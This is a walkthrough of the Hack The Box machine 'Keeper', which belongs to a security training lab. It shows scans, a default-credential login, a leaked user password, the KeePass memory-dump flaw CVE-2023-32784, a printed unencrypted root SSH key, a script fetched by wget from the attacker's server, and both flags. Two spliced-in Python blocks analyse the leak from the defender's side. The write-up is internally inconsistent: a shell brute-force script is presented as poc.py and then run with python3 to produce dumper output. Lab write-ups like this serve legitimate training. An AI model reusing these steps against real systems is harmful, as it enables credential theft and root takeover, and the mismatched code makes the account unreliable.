Keeper

About this machine: HTB

Operating system: Linux

Skills used:

  • PuTTY

  • ssh

  • rtg

  • kdbx

  • Abusing Sudoers

Methodology:

Initial reconnaissance with nmap:

nmap -p- --open -sS -T4 -Pn -n 10.10.11.227 -oN First_Scann
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-28 22:11 EDT
Stats: 0:00:39 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 80.95% done; ETC: 22:11 (0:00:09 remaining)
Nmap scan report for 10.10.11.227
Host is up (0.15s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Version and script scan:

nmap -p22,80 -n -sS -sVC 10.10.11.227 -oN sVC_Scann
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-28 22:12 EDT
Nmap scan report for 10.10.11.227
Host is up (0.14s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds

We see what is running on port 80:

(screenshot)

We run whatweb:

whatweb 10.10.11.227
http://10.10.11.227 [200 OK] Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.227], nginx[1.18.0]

We add the domain to /etc/hosts and this panel appears:

(screenshot)

We gain access with the default credentials root:password:

(screenshot)

We find another user in the system: lnorgaard (Lise Nørgaard, norgaard@keeper.htb).

(screenshot)

We find the password Welcome2023! in the settings panel:

(screenshot)

We log in via ssh:

ssh lnorgaard@10.10.11.227
lnorgaard@10.10.11.227's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
You have mail.
Last login: Tue Aug 8 11:31:22 2023 from 10.10.14.23
lnorgaard@keeper:~$

We are in; now we look for the first flag:

lnorgaard@keeper:~$ ls
RT30000.zip  user.txt
lnorgaard@keeper:~$ cat user.txt
45576ec7f82edaf435390b73098252ac

We unzip the zip file:

lnorgaard@keeper:~$ unzip RT30000.zip
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp
 extracting: passcodes.kdbx
lnorgaard@keeper:~$ ls
KeePassDumpFull.dmp  passcodes.kdbx  RT30000.zip  user.txt

We see it contains a KeePass memory dump and a passcodes database, which is associated with a vulnerability, specifically CVE-2023-32784, so we will exploit it following what is found in this repository:

https://github.com/vdohney/keepass-password-dumper

The script's contents:

#!/bin/sh
# Usage: ./keepass-pwn.sh Database.kdbx wordlist.txt (wordlist with 2 char)
# Tries each line of the wordlist as the database password with kpcli and
# exits at the first one that opens the database.

while read -r i; do
  echo "Using password: $i"
  echo "$i" | kpcli --kdb="$1" && exit 0
done < "$2"

We send it to the victim machine:

nvim poc.py
ls
poc.py

We start a Python web server:

python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.227 - - [28/May/2025 22:50:00] "GET /poc.py HTTP/1.1" 200 -

We download the script:

lnorgaard@keeper:~$ wget http://10.10.14.11/poc.py
--2025-05-29 04:49:52--  http://10.10.14.11/poc.py
Connecting to 10.10.14.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 188 [text/x-python]
Saving to: ‘poc.py’

poc.py              100%[=======================================================>]     188  --.-KB/s    in 0s

2025-05-29 04:49:53 (16.4 MB/s) - ‘poc.py’ saved [188/188]

lnorgaard@keeper:~$ ls
KeePassDumpFull.dmp  passcodes.kdbx  poc.py  RT30000.zip  user.txt

Now we run it and see whether it works:

lnorgaard@keeper:~$ python3 poc.py KeePassDumpFull.dmp
2023-09-06 08:51:35,828 [.] [main] Opened KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de
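The candidate list above is the raw output of the dumper. As an added example (not from this write-up or from the keepass-password-dumper project), the following Python collapses those candidates into a single mask and counts how many master-password positions the process dump exposed. That count is what an incident responder needs when deciding whether a leaked KeePass 2.x memory dump (CVE-2023-32784, fixed in KeePass 2.54) has compromised a vault. The constant and function names are my own; the input is a constructed copy of the thirteen lines printed above.

```python
# Added example, not part of the original write-up or the
# keepass-password-dumper project: from the dumper's "Possible password:"
# lines, work out how much of the master password the memory dump exposed.
# Constant and function names are my own.

UNKNOWN = "●"  # the dumper prints this for a character it could not recover

# Constructed input: the dumper output shown in the write-up above.
DUMPER_OUTPUT = """\
2023-09-06 08:51:35,828 [.] [main] Opened KeePassDumpFull.dmp
Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de
"""


def parse_candidates(text):
    """Keep only the 'Possible password:' lines and strip that prefix."""
    prefix = "Possible password: "
    return [line[len(prefix):] for line in text.splitlines()
            if line.startswith(prefix)]


def leak_summary(candidates):
    """Merge the candidates into one mask and count the exposed positions.

    In the mask, ● marks a position no candidate recovered (with this bug the
    first character is always lost, and here the two ø characters of the real
    password were not recovered either), '?' marks a position where the
    candidates disagree, and any other character was recovered consistently.
    """
    if not candidates:
        raise ValueError("no candidates")
    length = len(candidates[0])
    if any(len(c) != length for c in candidates):
        raise ValueError("candidates differ in length")
    mask = []
    counts = {"recovered": 0, "unknown": 0, "ambiguous": 0}
    for pos in range(length):
        chars = {c[pos] for c in candidates}
        if chars == {UNKNOWN}:
            mask.append(UNKNOWN)
            counts["unknown"] += 1
        elif len(chars) == 1:
            mask.append(chars.pop())
            counts["recovered"] += 1
        else:
            mask.append("?")
            counts["ambiguous"] += 1
    return {"mask": "".join(mask), "length": length, **counts}


if __name__ == "__main__":
    print(leak_summary(parse_candidates(DUMPER_OUTPUT)))
```

For the output above the mask comes out as ●?dgr●d med fl●de: 13 of 17 positions recovered outright, one ambiguous and three never recovered, which is why the dump alone was enough to guess the dessert name.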

After googling the term for an hour I found the dessert rødgrød med fløde, which closely matches the last possible password; also, remember that the user lnorgaard is from a country where this kind of dessert is very common. Now we can try to see whether we can read the passcodes with it:

kpcli:/passcodes/Network> show keeper.htb\ (Ticketing\ Server)

Path:  /passcodes/Network/
Title: keeper.htb (Ticketing Server)
Uname: root
 Pass: F4><3K0nd!
  URL:
Notes: PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55c

We have a PuTTY key; now we will convert it into a plain OpenSSH private key.

We save the contents to a file named key and then use the following commands:

puttygen key -O private-openssh -o id_rsa

chmod 600 id_rsa
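The key stored in the notes field above carries Encryption: none, meaning the PuTTY private key has no passphrase, so anyone able to read that vault entry can log in as root with it, which is exactly what the next step does. As an added example (not from this write-up), the following Python audits a .ppk file before it is handed to puttygen: it parses the PPK headers, checks the declared Public-Lines/Private-Lines counts against what is actually in the file, decodes the public blob (SSH wire format, length-prefixed fields) to report the key type and RSA modulus size, and flags an unencrypted private key. The names parse_ppk, audit_ppk and _sample_ppk are mine, and the sample key is a constructed, synthetic blob rather than the key on this page; to audit a real file, read it from disk and pass the text starting at the PuTTY-User-Key-File line.

```python
# Added example, not part of the original write-up: audit a PuTTY .ppk file
# before converting it with puttygen. Function names and the sample key are
# constructed for this example.
import base64
import struct


def _wire_string(data):
    """SSH wire-format string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(data)) + data


def _wire_mpint(value):
    """SSH wire-format mpint: big-endian magnitude, 0x00-padded if top bit set."""
    raw = value.to_bytes((value.bit_length() + 7) // 8, "big")
    if raw and raw[0] & 0x80:
        raw = b"\x00" + raw
    return _wire_string(raw)


def _chunk64(s):
    """Split base64 text into the 64-character lines PuTTY writes."""
    return [s[i:i + 64] for i in range(0, len(s), 64)]


def _sample_ppk(encryption="none"):
    """Constructed PPK3 text: a synthetic 2048-bit ssh-rsa public blob and
    filler private lines. The modulus is not a real key; only the format matters."""
    pub = (_wire_string(b"ssh-rsa") + _wire_mpint(65537)
           + _wire_mpint((1 << 2047) | 1))
    pub_lines = _chunk64(base64.b64encode(pub).decode())
    priv_lines = _chunk64(base64.b64encode(b"\x00" * 96).decode())
    return "\n".join([
        "PuTTY-User-Key-File-3: ssh-rsa",
        f"Encryption: {encryption}",
        "Comment: constructed-example-key",
        f"Public-Lines: {len(pub_lines)}", *pub_lines,
        f"Private-Lines: {len(priv_lines)}", *priv_lines,
        "Private-MAC: " + "00" * 32,
    ]) + "\n"


def parse_ppk(text):
    """Parse the PPK headers and decode the public blob into a dict."""
    lines = text.splitlines()
    info, i = {}, 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line.strip():
            continue
        key, _, value = line.partition(": ")
        if key.startswith("PuTTY-User-Key-File-"):
            info["version"] = int(key.rsplit("-", 1)[1])
            info["key_type"] = value.strip()
        elif key in ("Public-Lines", "Private-Lines"):
            # Consume the base64 lines that follow (they have no "key: value").
            block = []
            while i < len(lines) and lines[i].strip() and ": " not in lines[i]:
                block.append(lines[i].strip())
                i += 1
            info[key] = {"declared": int(value), "actual": len(block),
                         "data": "".join(block)}
        else:
            info[key] = value.strip()
    if "Public-Lines" not in info or "version" not in info:
        raise ValueError("not a PuTTY key file")
    # Public blob: length-prefixed fields; the first is the key type, and for
    # ssh-rsa the next two are the exponent e and the modulus n.
    blob = base64.b64decode(info["Public-Lines"]["data"])
    fields, off = [], 0
    while off + 4 <= len(blob):
        (ln,) = struct.unpack(">I", blob[off:off + 4])
        fields.append(blob[off + 4:off + 4 + ln])
        off += 4 + ln
    info["blob_type"] = fields[0].decode() if fields else ""
    if info["blob_type"] == "ssh-rsa" and len(fields) >= 3:
        info["rsa_bits"] = int.from_bytes(fields[2], "big").bit_length()
    return info


def audit_ppk(text):
    """Return (parsed info, findings a defender would act on)."""
    info = parse_ppk(text)
    findings = []
    if info.get("Encryption", "none") == "none":
        findings.append("private key stored without a passphrase (Encryption: none)")
    if info["version"] < 3:
        findings.append(f"PPK version {info['version']}; version 3 (PuTTY 0.75+) "
                        "derives the passphrase key with Argon2")
    for name in ("Public-Lines", "Private-Lines"):
        sec = info.get(name)
        if sec and sec["declared"] != sec["actual"]:
            findings.append(f"{name}: declared {sec['declared']} lines, found "
                            f"{sec['actual']} (truncated or tampered file)")
    if info["blob_type"] != info["key_type"]:
        findings.append(f"header says {info['key_type']} but blob is {info['blob_type']}")
    if info.get("rsa_bits", 4096) < 2048:
        findings.append(f"RSA modulus is only {info['rsa_bits']} bits")
    return info, findings


if __name__ == "__main__":
    parsed, issues = audit_ppk(_sample_ppk())
    print(parsed["key_type"], parsed.get("rsa_bits"), issues)
```

The Private-MAC is deliberately not verified here: for a passphrase-less key the MAC key is derived from an empty passphrase, so it only guards against accidental corruption, and the line-count check catches the same class of damage without reimplementing PuTTY's MAC construction.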

Now we log in via ssh with id_rsa:

ssh -i id_rsa root@10.10.11.227
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-78-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

You have new mail.
Last login: Tue Aug 8 19:00:06 2023 from 10.10.14.41
root@keeper:~# whoami
root

We are in; we look for the last flag and wrap up this machine:

root@keeper:~# ls
root.txt  RT30000.zip  SQL
root@keeper:~# cat root.txt
264636cdd0b2b39fe022d649e68a82ce
